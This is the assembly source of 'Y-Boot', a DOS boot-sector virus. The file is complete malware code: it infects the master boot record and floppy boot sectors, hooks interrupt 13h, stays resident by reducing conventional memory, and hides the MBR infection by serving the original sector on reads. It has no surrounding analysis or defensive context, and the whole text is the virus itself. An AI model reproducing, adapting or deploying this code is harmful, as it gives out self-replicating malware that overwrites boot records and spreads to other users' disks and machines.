;                       Y-Boot by Yosha/DC
;190 bytes so far, stealth on mbr, none on boot sectors
;overwrites boot sectors, so that when you boot from one, it just loads in the
;mbr.  I don't think it really matters since most boot infections come from
;someone accidentally leaving a disk in, so booting from the hard drive might
;actually be an advantage.

.model tiny
.code
.286
code_length equ offset finish - offset start
org 0h

start:
        db      0ebh,03eh
        db      3eh dup (90h)   ;original boot record
real_start:
;mbr&floppy infections start here
        xor     di,di
        mov     ds,di
;lower memory by 1k
        mov     si,412h
        inc     si
        dec     word ptr [si]
;convert 1k chunk to segment
        lodsw
        shl     ax,6
        mov     es,ax
;copy virus' code to allocated memory
        mov     bx,7c00h
        mov     si,bx
        call    move_code
;hook int 13h
        mov     si,13h*4
        movsw
        movsw
        mov     word ptr [si-4],offset int_13_handler
        mov     word ptr [si-2],ax
;transfer control to allocated memory
        push    es
        mov     ax,offset go_here
        push    ax
        retf
;arrives here
go_here:
;read in the mbr, even if floppy infection
        mov     es,cx
        call    read_in_mbr
;jump to 0000:7c00h and execute mbr
        push    es
        push    bx
        retf

move_code:
        mov     cx,code_length/2
        cld
        rep     movsw
        ret
write_sector:
        mov     ax,301h
        inc     cx
        jmp     call_13
read_in_mbr:
        mov     ax,201h
        inc     cx
        mov     dx,80h
call_13:
        pushf
        call    dword ptr cs:[old13]
        ret

signature       db      " Y-Boot by Yosha/DC "  ;most important part

int_13_handler:
;read to boot sector? If not exit
        cmp     ah,0ah
        je      yyy
        cmp     ah,2
        jne     exit_13
yyy:
        cmp     cx,1
        jne     exit_13
        or      dh,dh
        jne     exit_13
;read in the boot sector I guess
        pusha
        push    es
        push    cs
        pop     es
        mov     al,1
        mov     bx,offset buffer
        mov     di,bx
        call    call_13
;check if infected (by looking for the xor di,di)
        cmp     byte ptr es:[di+41h],0ffh
        je      stealth_it
;save original boot sector to sector 2 IF it's a read from the mbr
        cmp     dl,80h
        jne     no_save

        call    write_sector
        dec     cx
;make 1st 2 bytes a jump to code
no_save:
        mov     word ptr es:[di],3eebh
;now copy virus' code
        mov     si,40h
        add     di,3eh
        push    ds
        push    cs
        pop     ds
        call    move_code
        pop     ds
;write it
        call    write_sector
stealth_it:
;allow the read
        pop     es
        popa
        call    call_13
        pushf
        pusha
;if not hard drive then we're done (only stealth mbr)
        cmp     dl,80h
        jne     done_stealth
;read in sector 2 over that
        call    read_in_mbr
done_stealth:
        popa
        popf
        retf    2
exit_13:
        db      0eah
finish:
old13   dd      ?
buffer:
        end     start
